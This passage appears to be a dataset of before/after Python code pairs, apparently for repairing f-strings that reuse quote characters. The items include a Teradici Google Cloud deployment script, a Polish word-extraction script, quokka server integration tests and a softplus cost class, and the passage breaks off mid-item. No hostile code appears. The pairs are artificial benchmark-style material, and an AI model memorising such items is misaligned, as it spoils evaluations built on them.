4. Log in to https://cas.teradici.com and delete the deployment named
"quickstart_deployment_<timestamp>"
"""
print(next_steps)
print('')
| #!/usr/bin/env python3
# Copyright (c) 2019 Teradici Corporation
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import base64
import datetime
import importlib
import json
import os
import re
import shutil
import site
import subprocess
import sys
import textwrap
import time
import casmgr
import interactive
REQUIRED_PACKAGES = {
'google-api-python-client': None,
'grpc-google-iam-v1': None,
'google-cloud-kms': "2.0.0"
}
# Service Account ID of the service account to create
SA_ID = 'cas-manager'
SA_ROLES = [
'roles/editor',
'roles/cloudkms.cryptoKeyEncrypterDecrypter'
]
PROJECT_ID = os.environ['GOOGLE_CLOUD_PROJECT']
REQUIRED_APIS = [
'deploymentmanager.googleapis.com',
'cloudkms.googleapis.com',
'cloudresourcemanager.googleapis.com',
'compute.googleapis.com',
'dns.googleapis.com',
'iam.googleapis.com',
]
iso_time = datetime.datetime.utcnow().isoformat(timespec='seconds').replace(':','').replace('-','') + 'Z'
DEPLOYMENT_NAME = 'quickstart_deployment_' + iso_time
CONNECTOR_NAME = 'quickstart_cac_' + iso_time
# User entitled to workstations
ENTITLE_USER = 'Administrator'
HOME = os.path.expanduser('~')
TERRAFORM_BIN_DIR = f'{HOME}/bin'
TERRAFORM_BIN_PATH = TERRAFORM_BIN_DIR + '/terraform'
TERRAFORM_VER_PATH = '../deployments/gcp/single-connector/versions.tf'
CFG_FILE_PATH = 'gcp-cloudshell-quickstart.cfg'
DEPLOYMENT_PATH = 'deployments/gcp/single-connector'
# All of the following paths are relative to the deployment directory, DEPLOYMENT_PATH
TF_VARS_REF_PATH = 'terraform.tfvars.sample'
TF_VARS_PATH = 'terraform.tfvars'
SECRETS_DIR = 'secrets'
GCP_SA_KEY_PATH = SECRETS_DIR + '/gcp_service_account_key.json'
SSH_KEY_PATH = SECRETS_DIR + '/cas_mgr_admin_id_rsa'
CAS_MGR_DEPLOYMENT_SA_KEY_PATH = SECRETS_DIR + '/cas_mgr_deployment_sa_key.json.encrypted'
# Types of workstations
WS_TYPES = ['scent', 'gcent', 'swin', 'gwin']
def ensure_requirements():
if not PROJECT_ID:
print('The PROJECT property has not been set.')
print('Please run "gcloud config set project [PROJECT_ID]" to set the project.')
print('See: https://cloud.google.com/sdk/gcloud/reference/config/set')
print('')
sys.exit(1)
ensure_required_packages()
import_modules()
ensure_terraform()
def ensure_required_packages():
"""A function that ensures the correct version of Python packages are installed.
The function first checks if the required packages are installed. If a package is
installed, the required version number will then be checked. It will next prompt
the user to update or install the required packages.
"""
packages_to_install_list = []
for package, required_version in REQUIRED_PACKAGES.items():
check_cmd = f'{sys.executable} -m pip show {package}'
output = subprocess.run(check_cmd.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8')
# If a package is not found, skip version checking and simply install the latest package
if not output:
packages_to_install_list.append(package)
elif required_version is not None:
# Second line outputs the version of the specified package
current_version = output.splitlines()[1].split(' ')[-1]
# Convert the string into a tuple of numbers for comparison
current_version_tuple = tuple( map(int, current_version.split('.')) )
required_version_tuple = tuple( map(int, required_version.split('.')) )
if current_version_tuple < required_version_tuple:
packages_to_install_list.append(package)
if packages_to_install_list:
# Convert the list to a string of packages delimited by a space
packages_to_install = " ".join(packages_to_install_list)
install_cmd = f'{sys.executable} -m pip install --upgrade {packages_to_install} --user'
install_permission = input(
'One or more of the following Python packages are outdated or missing:\n'
f' {packages_to_install}\n\n'
'The script can install these packages in the user\'s home directory using the following command:\n'
f' {install_cmd}\n'
'Proceed? (y/n)? ').strip().lower()
if install_permission not in ('y', 'yes'):
print('Python packages are required for deployment. Exiting...')
sys.exit(1)
subprocess.check_call(install_cmd.split(' '))
# Refresh sys.path to detect new modules in user's home directory.
importlib.reload(site)
def import_modules():
"""A function that dynamically imports required Python packages.
"""
# Global calls for import statements are required to avoid module not found error
import_required_packages = '''\
import googleapiclient.discovery
from google.cloud import kms
from google.api_core import exceptions as google_exc
'''
# Recommended to clear cache after installing python packages for dynamic imports
importlib.invalidate_caches()
exec(textwrap.dedent(import_required_packages), globals())
print('Successfully imported required Python packages.')
def ensure_terraform():
"""A function that ensures the required Terraform version is installed.
The function first checks if the required Terraform version is installed in
the user's system. If Terraform is not installed, it will prompt the user to
install Terraform in the user's home directory.
"""
global TERRAFORM_BIN_PATH
path = shutil.which('terraform')
# Reference versions.tf file for the required version
with open(TERRAFORM_VER_PATH,"r") as f:
data = f.read()
required_version = re.search(r'\">=\s([\d.]+)\"', data).group(1)
if path:
cmd = 'terraform -v'
# Run the command 'terraform -v' and use the first line as the Terraform version
terraform_version = subprocess.run(cmd.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8').splitlines()[0]
print(f'Found {terraform_version} in {path}.')
# Use regex to parse the version number from string (i.e. 0.12.18)
current_version = re.search(r'Terraform\s*v([\d.]+)', terraform_version).group(1)
# Convert the string into a tuple of numbers for comparison
current_version_tuple = tuple( map(int, current_version.split('.')) )
required_version_tuple = tuple( map(int, required_version.split('.')) )
if current_version_tuple >= required_version_tuple:
TERRAFORM_BIN_PATH = path
return
install_permission = input(
f'This system is missing Terraform version >= {required_version}.\n'
f'Proceed to download and install Terraform in {TERRAFORM_BIN_DIR} (y/n)? ').strip().lower()
if install_permission not in ('y', 'yes'):
print('Terraform is required for deployment. Exiting...')
sys.exit(1)
install_cmd = f'{sys.executable} install-terraform.py {TERRAFORM_BIN_DIR}'
subprocess.run(install_cmd.split(' '), check=True)
def quickstart_config_read(cfg_file):
cfg_data = {}
with open(cfg_file, 'r') as f:
for line in f:
if line[0] in ('#', '\n'):
continue
key, value = map(str.strip, line.split(':'))
cfg_data[key] = value
return cfg_data
def service_account_find(email):
service_accounts = iam_service.projects().serviceAccounts().list(
name = f'projects/{PROJECT_ID}',
).execute()
if not service_accounts:
return
for account in service_accounts['accounts']:
if account['email'] == email:
return account
def service_account_create(email):
print('Creating Service Account...')
service_account = service_account_find(email)
if service_account:
print(f' Service account {email} already exists.')
# The service account limit check is placed here so that the script doesn't
# unfortunately exit after the user enters their configurations if error, but
# the key will be created later to avoid reaching the limit, in case
# something goes wrong and the script exits before the key is used.
service_account_create_key_limit_check(service_account)
return service_account
service_account = iam_service.projects().serviceAccounts().create(
name = 'projects/' + PROJECT_ID,
body = {
'accountId': SA_ID,
'serviceAccount': {
'displayName': SA_ID,
'description': 'Account used by CAS Manager to manage PCoIP workstations.',
}
}
).execute()
print(' Created service account: ' + service_account['email'])
return service_account
def service_account_create_key(service_account, filepath):
print(f'Created key for {service_account["email"]}...')
key = iam_service.projects().serviceAccounts().keys().create(
name = 'projects/-/serviceAccounts/' + service_account['email'],
body = {},
).execute()
key_data = base64.b64decode(key['privateKeyData'])
with open(filepath, 'wb') as keyfile:
keyfile.write(key_data)
print(' Key written to ' + filepath)
return json.loads(key_data.decode('utf-8'))
def service_account_create_key_limit_check(service_account):
print(f' Checking number of keys owned by {service_account["email"]}... ', end='')
keys = iam_service.projects().serviceAccounts().keys().list(
name='projects/-/serviceAccounts/' + service_account['email']
).execute()['keys']
user_managed_keys = list(filter(lambda k: (k['keyType'] == 'USER_MANAGED'), keys))
print(f'{len(user_managed_keys)}/10')
if len(user_managed_keys) >= 10:
print(f' ERROR: The service account has reached the limit of the number of keys it can create.',
' Please see: https://cloud.google.com/iam/docs/creating-managing-service-account-keys',
'Exiting script...', sep='\n')
sys.exit(1)
def iam_policy_update(service_account, roles):
policy = crm_service.projects().getIamPolicy(
resource = PROJECT_ID,
body = {},
).execute()
print('Adding roles:')
for role in roles:
print(f' {role}...')
binding = {
'role': role,
'members': [f'serviceAccount:{service_account["email"]}'],
}
policy['bindings'].append(binding)
policy = crm_service.projects().setIamPolicy(
resource = PROJECT_ID,
body = {
'policy': policy
}
).execute()
return policy
def apis_enable(apis):
print('Enabling APIs:')
# Using shell command, no Python Google Cloud Client library support
for api in apis:
print(f' {api}...')
subprocess.run(['gcloud', 'services', 'enable', api], check=True)
def ssh_key_create(path):
print('Creating SSH key...')
# note the space after '-N' is required
ssh_cmd = f'ssh-keygen -f {path} -t rsa -q -N '
subprocess.run(ssh_cmd.split(' '), check=True)
# Creates a new .tfvar based on the .tfvar.sample file
def tf_vars_create(ref_file_path, tfvar_file_path, settings):
if os.path.exists(tfvar_file_path):
overwrite = input("Found an existing .tfvar file, overwrite (y/n)? ").strip().lower()
if overwrite not in ('y', 'yes'):
print(f'{tfvar_file_path} already exists. Exiting...')
sys.exit(1)
with open(ref_file_path, 'r') as ref_file, open(tfvar_file_path, 'w') as out_file:
for line in ref_file:
if line[0] == '#':
# Check if it's an optional variable and uncomment if so
for k in settings.keys():
# Building string using + because can't use f"{k}" with regex
pattern = "^#\s*(" + k + ")\s*="
if re.search(pattern, line.strip()):
line = f'{k} = "{settings[k]}"\n'
elif line[0] != '\n':
key = line.split('=')[0].strip()
line = f'{key} = "{settings[key]}"\n'
out_file.write(line)
if __name__ == '__main__':
ensure_requirements()
print('Setting GCP project...')
sa_email = f'{SA_ID}@{PROJECT_ID}.iam.gserviceaccount.com'
iam_service = googleapiclient.discovery.build('iam', 'v1')
crm_service = googleapiclient.discovery.build('cloudresourcemanager', 'v1')
apis_enable(REQUIRED_APIS)
sa = service_account_create(sa_email)
iam_policy_update(sa, SA_ROLES)
print('GCP project setup complete.\n')
cfg_data = interactive.configurations_get(PROJECT_ID, WS_TYPES, ENTITLE_USER)
print('Preparing local requirements...')
os.chdir('../')
os.chdir(DEPLOYMENT_PATH)
# Paths passed into terraform.tfvars should be absolute paths
cwd = os.getcwd() + '/'
try:
print(f'Creating directory {SECRETS_DIR} to store secrets...')
os.mkdir(SECRETS_DIR, 0o700)
except FileExistsError:
print(f'Directory {SECRETS_DIR} already exists.')
ssh_key_create(SSH_KEY_PATH)
print('Local requirements setup complete.\n')
print('Setting CAS Manager...')
mycasmgr = casmgr.CASManager(cfg_data.get('api_token'))
# TODO: Add a proper clean up of GCP IAM resources so we don't have to move the
# service account creation to here after the rest of the GCP setup
sa_key = service_account_create_key(sa, GCP_SA_KEY_PATH)
print(f'Creating deployment {DEPLOYMENT_NAME}...')
deployment = mycasmgr.deployment_create(DEPLOYMENT_NAME, cfg_data.get('reg_code'))
mycasmgr.deployment_add_gcp_account(sa_key, deployment)
print('Creating CAS Manager API key...')
cas_mgr_deployment_key = mycasmgr.deployment_key_create(deployment)
print('CAS Manager setup complete.\n')
print('Encrypting secrets...')
days90 = 7776000
kms_client = kms.KeyManagementServiceClient()
parent = f"projects/{PROJECT_ID}/locations/{cfg_data.get('gcp_region')}"
key_ring_id = 'cloud_deployment_scripts'
key_ring_init = {}
try:
key_ring = kms_client.create_key_ring(request={'parent': parent, 'key_ring_id': key_ring_id, 'key_ring': key_ring_init})
print(f'Created Key Ring {key_ring.name}')
except google_exc.AlreadyExists:
print(f'Key Ring {key_ring_id} already exists. Using it...')
parent = kms_client.key_ring_path(PROJECT_ID, cfg_data.get('gcp_region'), key_ring_id)
crypto_key_id = 'quickstart_key'
crypto_key_init = {
'purpose': kms.CryptoKey.CryptoKeyPurpose.ENCRYPT_DECRYPT,
'rotation_period': {'seconds': days90},
'next_rotation_time': {'seconds': int(time.time()) + days90},
}
try:
crypto_key = kms_client.create_crypto_key(request={'parent': parent, 'crypto_key_id': crypto_key_id, 'crypto_key': crypto_key_init})
print(f'Created Crypto Key {crypto_key.name}')
except google_exc.AlreadyExists:
print(f'Crypto Key {crypto_key_id} already exists. Using it...')
key_name = kms_client.crypto_key_path(PROJECT_ID, cfg_data.get('gcp_region'), key_ring_id, crypto_key_id)
def kms_encode(key, text, base64_encoded=False):
encrypted = kms_client.encrypt(request={'name': key, 'plaintext': text.encode('utf-8')})
if base64_encoded:
return base64.b64encode(encrypted.ciphertext).decode('utf-8')
return encrypted.ciphertext
cfg_data['ad_password'] = kms_encode(key_name, cfg_data.get('ad_password'), True)
cfg_data['reg_code'] = kms_encode(key_name, cfg_data.get('reg_code'), True)
cas_mgr_deployment_key_encrypted = kms_encode(key_name, json.dumps(cas_mgr_deployment_key))
print('Done encrypting secrets.')
print('Creating CAS Manager Deployment Service Account Key...')
with open(CAS_MGR_DEPLOYMENT_SA_KEY_PATH, 'wb+') as keyfile:
keyfile.write(cas_mgr_deployment_key_encrypted)
print(' Key written to ' + CAS_MGR_DEPLOYMENT_SA_KEY_PATH)
print('Deploying with Terraform...')
#TODO: refactor this to work with more types of deployments
settings = {
'gcp_credentials_file': cwd + GCP_SA_KEY_PATH,
'gcp_region': cfg_data.get('gcp_region'),
'gcp_zone': cfg_data.get('gcp_zone'),
'kms_cryptokey_id': key_name,
'dc_admin_password': cfg_data.get('ad_password'),
'safe_mode_admin_password': cfg_data.get('ad_password'),
'ad_service_account_password': cfg_data.get('ad_password'),
'cac_admin_ssh_pub_key_file': cwd + SSH_KEY_PATH + '.pub',
'win_gfx_instance_count': cfg_data.get('gwin'),
'win_std_instance_count': cfg_data.get('swin'),
'centos_gfx_instance_count': cfg_data.get('gcent'),
'centos_std_instance_count': cfg_data.get('scent'),
'centos_admin_ssh_pub_key_file': cwd + SSH_KEY_PATH + '.pub',
'pcoip_registration_code': cfg_data.get('reg_code'),
'cas_mgr_deployment_sa_file': cwd + CAS_MGR_DEPLOYMENT_SA_KEY_PATH
}
# update tfvar
tf_vars_create(TF_VARS_REF_PATH, TF_VARS_PATH, settings)
tf_cmd = f'{TERRAFORM_BIN_PATH} init'
subprocess.run(tf_cmd.split(' '), check=True)
tf_cmd = f'{TERRAFORM_BIN_PATH} apply -auto-approve'
subprocess.run(tf_cmd.split(' '), check=True)
comp_proc = subprocess.run([TERRAFORM_BIN_PATH,'output','cac-public-ip'],
check=True,
stdout=subprocess.PIPE)
cac_public_ip = comp_proc.stdout.decode().split('"')[1]
print('Terraform deployment complete.\n')
# To update the auth_token used by the session header for the API call
# with the one from the deployment key in case the API Token expires
mycasmgr.deployment_signin(cas_mgr_deployment_key)
# Add existing workstations
for t in WS_TYPES:
for i in range(int(cfg_data.get(t))):
hostname = f'{t}-{i}'
print(f'Adding "{hostname}" to CAS Manager...')
mycasmgr.machine_add_existing(
hostname,
PROJECT_ID,
cfg_data.get('gcp_zone'),
deployment
)
# Loop until Administrator user is found in CAS Manager
while True:
entitle_user = mycasmgr.user_get(ENTITLE_USER, deployment)
if entitle_user:
break
print(f'Waiting for user "{ENTITLE_USER}" to be synced. Retrying in 10 seconds...')
time.sleep(10)
# Add entitlements for each workstation
machines_list = mycasmgr.machines_get(deployment)
for machine in machines_list:
print(f'Assigning workstation "{machine["machineName"]}" to user "{ENTITLE_USER}"...')
mycasmgr.entitlement_add(entitle_user, machine)
print('\nQuickstart deployment finished.\n')
print('')
next_steps = f"""
Next steps:
- Connect to a workstation:
1. from a PCoIP client, connect to the Cloud Access Connector at {cac_public_ip}
2. sign in with the "{ENTITLE_USER}" user credentials
3. When connecting to a workstation immediately after this script completes,
the workstation (especially graphics ones) may still be setting up. You may
see "Remote Desktop is restarting..." in the client. Please wait a few
minutes or reconnect if it times out.
- Add additional workstations:
1. Log in to https://cas.teradici.com
2. Click on "Workstations" in the left panel, select "Create new remote
workstation" from the "+" button
3. Select connector "quickstart_cac_<timestamp>"
4. Fill in the form according to your preferences. Note that the following
values must be used for their respective fields:
Region: "{cfg_data.get('gcp_region')}"
Zone: "{cfg_data.get('gcp_zone')}"
Network: "vpc-cas"
Subnetowrk: "subnet-ws"
Domain name: "example.com"
Domain service account: "cas_ad_admin"
Service account password: <set by you at start of script>
5. Click **Create**
- Clean up:
1. Using GCP console, delete all workstations created by CAS Manager
web interface and manually created workstations. Resources not created by
the Terraform scripts must be manually removed before Terraform can
properly destroy resources it created.
2. In GCP cloudshell, change directory using the command "cd ~/cloudshell_open/cloud_deployment_scripts/{DEPLOYMENT_PATH}"
3. Remove resources deployed by Terraform using the command "terraform destroy". Enter "yes" when prompted.
"{'terraform' if TERRAFORM_BIN_PATH == shutil.which('terraform') else TERRAFORM_BIN_PATH} destroy"
4. Log in to https://cas.teradici.com and delete the deployment named
"quickstart_deployment_<timestamp>"
"""
print(next_steps)
print('')
|
import glob
from icu import Collator, Locale
import os
import re
import yaml
import shutil
with_sorting = False
outdir = "words"
if os.path.exists(outdir):
shutil.rmtree(outdir)
os.makedirs(outdir)
collator = Collator.createInstance(Locale("pl_PL.UTF-8"))
separator = re.compile("[\W\d]+")
for path in glob.glob("../data/pl/**/*.yml", recursive=True):
print(os.path.basename(path))
with open(path) as file:
meta = yaml.safe_load(file)
with open(path.replace(".yml", ".txt")) as file:
text = file.read().lower().rstrip()
words = set(re.split(separator, text))
with open(f"{outdir}/extracted-words-for-{meta["label"]}.txt", "w") as file:
if with_sorting:
words = sorted(words, key=collator.getSortKey)
file.write("\n".join(words))
| import glob
from icu import Collator, Locale
import os
import re
import yaml
import shutil
with_sorting = False
outdir = "words"
if os.path.exists(outdir):
shutil.rmtree(outdir)
os.makedirs(outdir)
collator = Collator.createInstance(Locale("pl_PL.UTF-8"))
separator = re.compile("[\W\d]+")
for path in glob.glob("../data/pl/**/*.yml", recursive=True):
print(os.path.basename(path))
with open(path) as file:
meta = yaml.safe_load(file)
with open(path.replace(".yml", ".txt")) as file:
text = file.read().lower().rstrip()
words = set(re.split(separator, text))
with open(f"{outdir}/extracted-words-for-{meta['label']}.txt", "w") as file:
if with_sorting:
words = sorted(words, key=collator.getSortKey)
file.write("\n".join(words))
|
import inspect
import unittest
from datetime import datetime
import requests
import yaml
import io
from contextlib import redirect_stdout
from quokka_server.device_monitor import discovery as device_discovery
from quokka_server.service_monitor import discovery as service_discovery
# Note: these tests require the quokka server to be running,
# with TESTDB database, e.g. with the following command:
# export FLASK_APP=quokka_server.py ; export TESTDB ; flask run --port 5001
test_hosts = {
"test-host-1": {
"ip_address": "10.0.0.1",
"mac_address": "00:11:22:33:44:01",
"hostname": "test-host-1",
"last_heard": str(datetime.now())[:-3],
"availability": True,
"response_time": "0.501",
},
"test-host-2": {
"ip_address": "10.0.0.2",
"mac_address": "00:11:22:33:44:02",
"hostname": "test-host-2",
"last_heard": str(datetime.now())[:-3],
"availability": True,
"response_time": "0.502",
},
}
class TestQuokka(unittest.TestCase):
def test_hosts(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Storing hosts into quokka:")
for hostname, host in test_hosts.items():
rsp = requests.put("http://127.0.0.1:5001/hosts", params={"hostname": hostname}, json=host)
self.assertEqual(rsp.status_code, 204, f"status code: expected 204, received {rsp.status_code}")
print(f"---> host: {hostname} stored into quokka: success")
print("\nRetrieving hosts from quokka:")
rsp = requests.get("http://127.0.0.1:5001/hosts")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
hosts = rsp.json()
print(f"---> Retrieved {len(hosts)} hosts: success")
print(f"\nComparing hosts to originals")
self.assertTrue(isinstance(hosts, dict))
self.assertEqual(len(hosts), len(test_hosts), "wrong number of hosts retrieved")
for hostname, host in hosts.items():
self.assertTrue(hostname in test_hosts, f"hostname: {hostname} not in test_hosts")
self.assertEqual(host, test_hosts[hostname], f"host not equal to test_host")
print(f"---> Compared host: {hostname}: success")
def test_devices(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Discovering devices using device_monitor")
with io.StringIO() as buf, redirect_stdout(buf):
device_discovery()
print("Discovering devices using device_monitor: completed")
with open("devices.yaml", "r") as yaml_in:
yaml_devices = yaml_in.read()
devices_from_file = yaml.safe_load(yaml_devices)
print("\nRetrieving devices from quokka:")
rsp = requests.get("http://127.0.0.1:5001/devices")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
devices = rsp.json()
print(f"---> Retrieved {len(devices)} devices: success")
print(f"\nComparing hosts to originals")
self.assertTrue(isinstance(devices, dict))
self.assertEqual(len(devices), len(devices_from_file), "wrong number of devices retrieved")
for device_from_file in devices_from_file:
self.assertTrue(device_from_file["name"] in devices, f"device: {device_from_file["name"]} not found in devices")
device = devices[device_from_file["name"]]
self.assertEqual(device_from_file["name"], device["name"], "device names do not match")
self.assertEqual(device_from_file["os"], device["os"], "device oses do not match")
self.assertEqual(device_from_file["hostname"], device["hostname"], "device hostnames do not match")
self.assertEqual(device_from_file["password"], device["password"], "device passwords do not match")
self.assertEqual(device_from_file["username"], device["username"], "device usernames do not match")
self.assertEqual(device_from_file["vendor"], device["vendor"], "device vendors do not match")
self.assertEqual(device_from_file["transport"], device["transport"], "device transports do not match")
print(f"---> Compared device: {device["name"]}: success")
def test_services(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Discovering services using service_monitor")
with io.StringIO() as buf, redirect_stdout(buf):
service_discovery()
print("Discovering services using service_monitor: completed")
with open("services.yaml", "r") as yaml_in:
yaml_services = yaml_in.read()
services_from_file = yaml.safe_load(yaml_services)
print("\nRetrieving services from quokka:")
rsp = requests.get("http://127.0.0.1:5001/services")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
services = rsp.json()
print(f"---> Retrieved {len(services)} services: success")
print(f"\nComparing services to originals")
self.assertTrue(isinstance(services, dict))
self.assertEqual(len(services), len(services_from_file), "wrong number of services retrieved")
for service_from_file in services_from_file:
self.assertTrue(service_from_file["name"] in services, f"service: {service_from_file["name"]} not found in services")
service = services[service_from_file["name"]]
self.assertEqual(service_from_file["name"], service["name"], "service names do not match")
self.assertEqual(service_from_file["type"], service["type"], "service types do not match")
self.assertEqual(service_from_file["target"], service["target"], "service targets do not match")
if "data" in service_from_file:
self.assertEqual(service_from_file["data"], service["data"], "service passwords do not match")
print(f"---> Compared service: {service["name"]}: success")
if __name__ == "__main__":
unittest.main()
| import inspect
import unittest
from datetime import datetime
import requests
import yaml
import io
from contextlib import redirect_stdout
from quokka_server.device_monitor import discovery as device_discovery
from quokka_server.service_monitor import discovery as service_discovery
# Note: these tests require the quokka server to be running,
# with TESTDB database, e.g. with the following command:
# export FLASK_APP=quokka_server.py ; export TESTDB ; flask run --port 5001
test_hosts = {
"test-host-1": {
"ip_address": "10.0.0.1",
"mac_address": "00:11:22:33:44:01",
"hostname": "test-host-1",
"last_heard": str(datetime.now())[:-3],
"availability": True,
"response_time": "0.501",
},
"test-host-2": {
"ip_address": "10.0.0.2",
"mac_address": "00:11:22:33:44:02",
"hostname": "test-host-2",
"last_heard": str(datetime.now())[:-3],
"availability": True,
"response_time": "0.502",
},
}
class TestQuokka(unittest.TestCase):
    """Integration tests against a live quokka server on 127.0.0.1:5001 (see header note)."""
    def test_hosts(self):
        """PUT each test_hosts fixture to /hosts, then GET /hosts and compare round-trip."""
        print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
        print("Storing hosts into quokka:")
        for hostname, host in test_hosts.items():
            rsp = requests.put("http://127.0.0.1:5001/hosts", params={"hostname": hostname}, json=host)
            self.assertEqual(rsp.status_code, 204, f"status code: expected 204, received {rsp.status_code}")
            print(f"---> host: {hostname} stored into quokka: success")
        print("\nRetrieving hosts from quokka:")
        rsp = requests.get("http://127.0.0.1:5001/hosts")
        self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
        hosts = rsp.json()
        print(f"---> Retrieved {len(hosts)} hosts: success")
        print(f"\nComparing hosts to originals")
        self.assertTrue(isinstance(hosts, dict))
        self.assertEqual(len(hosts), len(test_hosts), "wrong number of hosts retrieved")
        for hostname, host in hosts.items():
            self.assertTrue(hostname in test_hosts, f"hostname: {hostname} not in test_hosts")
            self.assertEqual(host, test_hosts[hostname], f"host not equal to test_host")
            print(f"---> Compared host: {hostname}: success")
    def test_devices(self):
        """Run device discovery (stdout suppressed), then compare devices.yaml to GET /devices."""
        print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
        print("Discovering devices using device_monitor")
        # redirect_stdout keeps discovery's own prints out of the test output
        with io.StringIO() as buf, redirect_stdout(buf):
            device_discovery()
        print("Discovering devices using device_monitor: completed")
        # discovery is expected to have written devices.yaml in the working directory
        with open("devices.yaml", "r") as yaml_in:
            yaml_devices = yaml_in.read()
        devices_from_file = yaml.safe_load(yaml_devices)
        print("\nRetrieving devices from quokka:")
        rsp = requests.get("http://127.0.0.1:5001/devices")
        self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
        devices = rsp.json()
        print(f"---> Retrieved {len(devices)} devices: success")
        print(f"\nComparing hosts to originals")
        self.assertTrue(isinstance(devices, dict))
        self.assertEqual(len(devices), len(devices_from_file), "wrong number of devices retrieved")
        for device_from_file in devices_from_file:
            self.assertTrue(device_from_file["name"] in devices, f"device: {device_from_file['name']} not found in devices")
            device = devices[device_from_file["name"]]
            self.assertEqual(device_from_file["name"], device["name"], "device names do not match")
            self.assertEqual(device_from_file["os"], device["os"], "device oses do not match")
            self.assertEqual(device_from_file["hostname"], device["hostname"], "device hostnames do not match")
            self.assertEqual(device_from_file["password"], device["password"], "device passwords do not match")
            self.assertEqual(device_from_file["username"], device["username"], "device usernames do not match")
            self.assertEqual(device_from_file["vendor"], device["vendor"], "device vendors do not match")
            self.assertEqual(device_from_file["transport"], device["transport"], "device transports do not match")
            print(f"---> Compared device: {device['name']}: success")
    def test_services(self):
        """Run service discovery (stdout suppressed), then compare services.yaml to GET /services."""
        print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
        print("Discovering services using service_monitor")
        with io.StringIO() as buf, redirect_stdout(buf):
            service_discovery()
        print("Discovering services using service_monitor: completed")
        # discovery is expected to have written services.yaml in the working directory
        with open("services.yaml", "r") as yaml_in:
            yaml_services = yaml_in.read()
        services_from_file = yaml.safe_load(yaml_services)
        print("\nRetrieving services from quokka:")
        rsp = requests.get("http://127.0.0.1:5001/services")
        self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
        services = rsp.json()
        print(f"---> Retrieved {len(services)} services: success")
        print(f"\nComparing services to originals")
        self.assertTrue(isinstance(services, dict))
        self.assertEqual(len(services), len(services_from_file), "wrong number of services retrieved")
        for service_from_file in services_from_file:
            self.assertTrue(service_from_file["name"] in services, f"service: {service_from_file['name']} not found in services")
            service = services[service_from_file["name"]]
            self.assertEqual(service_from_file["name"], service["name"], "service names do not match")
            self.assertEqual(service_from_file["type"], service["type"], "service types do not match")
            self.assertEqual(service_from_file["target"], service["target"], "service targets do not match")
            if "data" in service_from_file:
                # NOTE(review): "passwords" in this message looks copy-pasted from test_devices
                self.assertEqual(service_from_file["data"], service["data"], "service passwords do not match")
            print(f"---> Compared service: {service['name']}: success")
if __name__ == "__main__":
    # Run the integration suite when this file is executed directly.
    unittest.main()
|
" Implementation of the softplus cost function"
from typing import List
import numpy as np
from rxn_network.core import CostFunction
from rxn_network.reactions import ComputedReaction
class Softplus(CostFunction):
    """
    The softplus cost function is a smooth version of the Rectified Linear Unit (
    ReLU) function commonly used in neural networks. It has the property that the
    output goes to 0 as the input goes to negative infinity, but the output
    approaches a linear scaling as the input goes to positive infinity. This is an
    especially useful mapping for applying it to determine costs in reaction networks.
    """
    def __init__(
        self,
        temp: float = 300,
        params: List[str] = ["energy_per_atom"],
        weights: List[float] = [1.0],
    ):
        """
        Args:
            temp: Temperature [K].
            params: List of data dictionary keys for function parameters used in the
                softplus function. Defaults to ["energy_per_atom"]
            weights: List of corresponding values by which to weight the
                function parameters. Defaults to [1.0].
        """
        self.temp = temp
        # Copy the list so instances never alias the shared mutable default.
        self.params = list(params)
        self.weights = np.array(weights)
    def evaluate(self, rxn: ComputedReaction) -> float:
        """
        Calculates the cost of reaction based on the initialized parameters and weights.
        Args:
            rxn: A computed reaction.
        Returns:
            The cost of the reaction.
        Raises:
            ValueError: If a requested parameter is neither in rxn.data nor an
                attribute of the reaction.
        """
        values = []
        for p in self.params:
            # Prefer the reaction's data dict; fall back to a same-named attribute.
            if rxn.data and p in rxn.data:
                value = rxn.data[p]
            elif hasattr(rxn, p):
                value = getattr(rxn, p)
            else:
                raise ValueError(f"Reaction is missing parameter {p}!")
            values.append(value)
        total = np.dot(np.array(values), self.weights)
        return self._softplus(total, self.temp)
    @staticmethod
    def _softplus(x: float, t: float) -> float:
        """The mathematical formula for the softplus function.

        Note the fixed 273 reference in the temperature scaling factor (273/t).
        """
        return np.log(1 + (273 / t) * np.exp(x))
    def __repr__(self):
        # Build "key (weight)" pairs. The previous implementation reused the
        # enclosing quote characters inside the f-string expression, which is a
        # SyntaxError (quote reuse is only legal from Python 3.12 / PEP 701).
        pairs = " ".join(f"{k} ({v})" for k, v in zip(self.params, self.weights))
        return f"Softplus with parameters: {pairs}"
| " Implementation of the softplus cost function"
from typing import List
import numpy as np
from rxn_network.core import CostFunction
from rxn_network.reactions import ComputedReaction
class Softplus(CostFunction):
    """
    The softplus cost function is a smooth version of the Rectified Linear Unit (
    ReLU) function commonly used in neural networks. It has the property that the
    output goes to 0 as the input goes to negative infinity, but the output
    approaches a linear scaling as the input goes to positive infinity. This is an
    especially useful mapping for applying it to determine costs in reaction networks.
    """
    def __init__(
        self,
        temp: float = 300,
        params: List[str] = ["energy_per_atom"],
        weights: List[float] = [1.0],
    ):
        """
        Args:
            temp: Temperature [K].
            params: List of data dictionary keys for function parameters used in the
                softplus function. Defaults to ["energy_per_atom"]
            weights: List of corresponding values by which to weight the
                function parameters. Defaults to [1.0].
        """
        # NOTE(review): mutable list defaults are shared across calls; they are
        # only read here, but copying would be safer — TODO confirm.
        self.temp = temp
        self.params = params
        self.weights = np.array(weights)
    def evaluate(self, rxn: ComputedReaction) -> float:
        """
        Calculates the cost of reaction based on the initialized parameters and weights.
        Args:
            rxn: A computed reaction.
        Returns:
